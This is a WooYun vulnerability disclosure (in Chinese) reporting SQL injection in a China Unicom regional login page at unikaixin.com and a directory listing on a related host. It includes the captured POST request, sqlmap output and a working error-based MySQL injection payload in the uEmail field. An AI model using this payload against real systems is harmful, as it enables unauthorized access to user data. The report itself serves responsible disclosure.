当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120395

漏洞标题:某省联通登陆接口注入导致9000多用户信息泄露(附多站点案例)

相关厂商:中国联通

漏洞作者: myhalo

提交时间:2015-06-14 20:36

修复时间:2015-08-03 12:12

公开时间:2015-08-03 12:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-14: 细节已通知厂商并且等待厂商处理中
2015-06-19: 厂商已经确认,细节仅向厂商公开
2015-06-29: 细节向核心白帽子及相关领域专家公开
2015-07-09: 细节向普通白帽子公开
2015-07-19: 细节向实习白帽子公开
2015-08-03: 细节向公众公开

简要描述:

一开始还以为是多个站都存在注入,后来分析下原来是统一的登陆接口、
其次还有一个站点存在目录遍历的问题、

详细说明:

存在问题的接口:http://u.unikaixin.com/login.php

1.png


POST /login.php HTTP/1.1
Host: u.unikaixin.com
Proxy-Connection: keep-alive
Content-Length: 133
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://u.unikaixin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.9 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://u.unikaixin.com/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: lzstat_uv=9780314512039956613|3136890; Hm_lvt_184dde90cfe608e239da058b9cebea69=1434213196,1434213212,1434213388,1434213670; PHPSESSID=n3mbtagm7a0rsj3m0p5g1orgi4; __utma=229623640.1915383900.1434212843.1434213363.1434248687.3; __utmc=229623640; __utmz=229623640.1434248687.3.3.utmccn=(referral)|utmcsr=go.unikaixin.com|utmcct=/webclient/chuxingpindao/zsjt.jsp|utmcmd=referral; lzstat_ss=2522848668_1_1434277890_3136890; __utmb=229623640
a=L&returl=http%253A%252F%252Fu.unikaixin.com%252F&uEmail=admin&uPass=admin&yanzhengma=6223&jiyi=on&imageField.x=120&imageField.y=38


sqlmap identified the following injection points with a total of 482 HTTP(s) requests:
---
Place: POST
Parameter: uEmail
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: a=L&returl=http%3A%2F%2Fu.unikaixin.com%2F&uEmail=admin' AND (SELECT 2031 FROM(SELECT COUNT(*),CONCAT(0x716c646e71,(SELECT (CASE WHEN (2031=2031) THEN 1 ELSE 0 END)),0x7161767771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tiry'='tiry&uPass=admin&yanzhengma=6223&jiyi=on&imageField.x=120&imageField.y=38
---
[11:21:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.4.35, Apache 2.2.15
back-end DBMS: MySQL 5.0


2.png


3.png


以下下站点也受影响:
http://disk.unikaixin.com/unicom/login.jsp
http://go.unikaixin.com/webclient/chuxingpindao/zsjt.jsp

4.png


漏洞证明:

注入已证明,但是这里还有一处目录遍历的、
http://disk.unikaixin.com:82/

5.png


顺便帮我把这个也审核下咯:http://www.wooyun.org/bugs/wooyun-2015-0119740/trace/15741d4a0ca3f3f2fb9b89388d92fc26

修复方案:

过滤、删除铭感信息文件,文件目录加权限

版权声明:转载请注明来源 myhalo@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-06-19 12:10

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发通报,由其后续协网站调管理单位处置.

最新状态:

暂无